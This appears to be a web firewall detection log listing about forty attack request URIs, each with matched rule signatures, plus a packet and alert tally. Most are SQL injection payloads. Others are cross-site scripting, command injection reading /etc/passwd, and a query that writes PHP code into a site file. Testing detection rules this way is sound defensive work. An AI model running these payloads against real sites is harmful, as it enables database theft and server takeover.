Packet [153]	Uri [/sources/view.query.php?type=connections_logs&order=(SELECT%20(CASE%20WHEN%20(6688=6688)%20THEN%206688%20ELSE%206688*(SELECT%206688%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&direction=DESC]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [154]	Uri [/sources/view.query.php?type=connections_logs&order=date%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vhPw)&direction=DESC]	Nattacks [1 ]	Signatures	[942160]
Packet [155]	Uri [/sources/view.query.php?type=errors_logs&order=date&direction=,%20%20(SELECT%20(CASE%20WHEN%20(1739=1739)%20THEN%201739%20ELSE%201739*(SELECT%201739%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [159]	Uri [/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)</script>&content=<script>alert(1)</script>&author=<script>alert(1)</script>SATAN&visibility=1&type=1&comm=0]	Nattacks [3 ]	Signatures	[941100]	[941110]	[941160]
Packet [160]	Uri [/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=1&title=&content=&author=<script>alert(666)</script>&visibility=1&type=1&comm=0]	Nattacks [3 ]	Signatures	[941100]	[941110]	[941160]
Packet [162]	Uri [/cgit/blob/cgit.c?mimetype=text/html%0d%0a%0d%0a<script>xss</script>]	Nattacks [3 ]	Signatures	[941100]	[941110]	[941160]
Packet [163]	Uri [/cgi-bin/dna/sysAdmin.cgi?$'investigator=&username=&navUserName=&investigator=&username=&executeCmdData=uname%20-a&Action=executeCmd']	Nattacks [1 ]	Signatures	[932150]
Packet [164]	Uri [/wp-admin/admin-ajax.php?action=catalogue_update_order&list-item[1]=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))jXfE)]	Nattacks [1 ]	Signatures	[942160]
Packet [172]	Uri [/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'%20IF(UNICODE(SUBSTRING((SELECT%20TOP%201%20ISNULL(CAST(name%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20master..sysdatabases%20WHERE%20name%20NOT%20IN%20(SELECT%20TOP%207%20name%20FROM%20master..sysdatabases%20ORDER%20BY%20name)%20ORDER%20BY%20name),5,1))>104)%20WAITFOR%20DELAY%20'0:0:1'--%20qvAV&after=1523013041889&lang=de&_dc=1523013101769]	Nattacks [2 ]	Signatures	[942140]	[942280]
Packet [173]	Uri [/cgi-bin/CGIProxy.fcgi?cmd=asd&usr=asd&pwd=asd&remoteIp=`python%20-c%20"print%20('A'*266%20+%20'x9cx32')"`]	Nattacks [2 ]	Signatures	[932105]	[932115]
Packet [174]	Uri [/ladder/stats.php?game=W2BN&type=1&user=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [175]	Uri [/ladder/stats.php?game=cat%20/etc/passwd&type=cat%20/etc/passwd&sortBy=username&sort_direction=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [180]	Uri [/images//lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [183]	Uri [/api/sms_check.php?param=1%27and%20extractvalue(1,concat(0x7e,user()))%23]	Nattacks [1 ]	Signatures	[942190]
Packet [184]	Uri [/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(select*from(select(sleep(20)))a)&wpfs=fff&wpfin=entire-posts]	Nattacks [1 ]	Signatures	[942160]
Packet [188]	Uri [/view.php?id=-1'%20union%20select%201,version(),3,database(),5,6#]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [199]	Uri [/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=-1+UNION+ALL+SELECT+NULL,@@VERSION,NULL,NULL--::/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=1+and+1=0]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [200]	Uri [/wordpress/wp-admin/admin.php?page=events&action=delete_recurrence_series&recurrence_id=0+and+sleep(+if(ascii(substr(database(),1,1))<119,0,5))#]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [202]	Uri [/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2::/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))::/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)::/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)]	Nattacks [2 ]	Signatures	[942160]	[942170]
Packet [203]	Uri [/esiclivre/restrito/inc/lkpcep.php?q=AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5-(IF(ORD(MID((SELECT%20DISTINCT(HEX(IFNULL(CAST(schema_name%20AS%20CHAR),0x20)))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%2013,1),11,1))>1,0,5)))))oslN)--%20UACx]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [204]	Uri [/recept.php?id=-1%20union%20select%20user()]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [205]	Uri [/playlists.php?playlist='%20UNION%20SELECT%20null,concat(0x223c2f613e3c2f64%2069763e3c2f6469763e,version(),0%20x3c212d2d),null,null,null,null%20,null,null,null,null,null--%20-]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [206]	Uri [/phpCollab-v2.5.1/newsdesk/newsdesk.php?action=show&id=1%20and%20ascii(substr(md5(1),1,1))=99&PHPSESSID=aoanbk4f8dl89trecdir46dq82]	Nattacks [1 ]	Signatures	[943120]
Packet [320]	Uri [/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [322]	Uri [/listing?keywords=1%20and%201=1&location=All%20United%20States&placetype=country&placeid=2311%20and%201=1&cat=1%20and%201=1&subcat=51%20and%201=1&filter=&sort=Newest&Submit='%20UNION%20ALL%20SELECT%20NULL,CONCAT(version(),0x7e7e,database()),NULL--%20gLLf]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [377]	Uri [/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23::/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [382]	Uri [/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271::/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1::/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit%201)&queue=history]	Nattacks [3 ]	Signatures	[942160]	[942170]	[942360]
Packet [385]	Uri [/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27]	Nattacks [2 ]	Signatures	[942160]	[942230]
Packet [386]	Uri [/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202::/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [389]	Uri [/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28do%20cument.cookie%29;%3C/script%3E::/admin/stats_monthly_sales.php?status=0%20union%20select%20'<?%20php_code%20?>'%20INTO%20OUTFILE%20'../../../path/to/site/file.php']	Nattacks [10 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[933100]	[941100]	[941110]	[941160]	[942190]
Packet [390]	Uri [/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+::/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+::/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [394]	Uri [/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+::/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+::/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+::/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+::/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [396]	Uri [/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [397]	Uri [/script/load-calendar.php?view=1&month=6&year=2013&cid=1cat%20/etc/passwd::/script/load-calendar.php?cid=1cat%20/etc/passwd::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [405]	Uri [/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [407]	Uri [/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20]	Nattacks [1 ]	Signatures	[942160]
Packet [408]	Uri [/wp-admin/admin.php?page=wrp-add-new&id=2%20union%20select%201,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [409]	Uri [/acms/admin/uploads.php?id=1%20and(select%201%20FROM(select%20%20count(*),concat((select%20(select%20concat(database()))%20FROM%20%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20%20information_schema.tables%20GROUP%20BY%20x)a)]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [416]	Uri [/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin::/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0]	Nattacks [3 ]	Signatures	[942190]	[942270]	[942360]
Packet [419]	Uri [/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi%20on%28%29,3,4,5,6,7,8,9]	Nattacks [1 ]	Signatures	[942190]
# N. packets [420], [134] with alerts, N. Alerts [308]
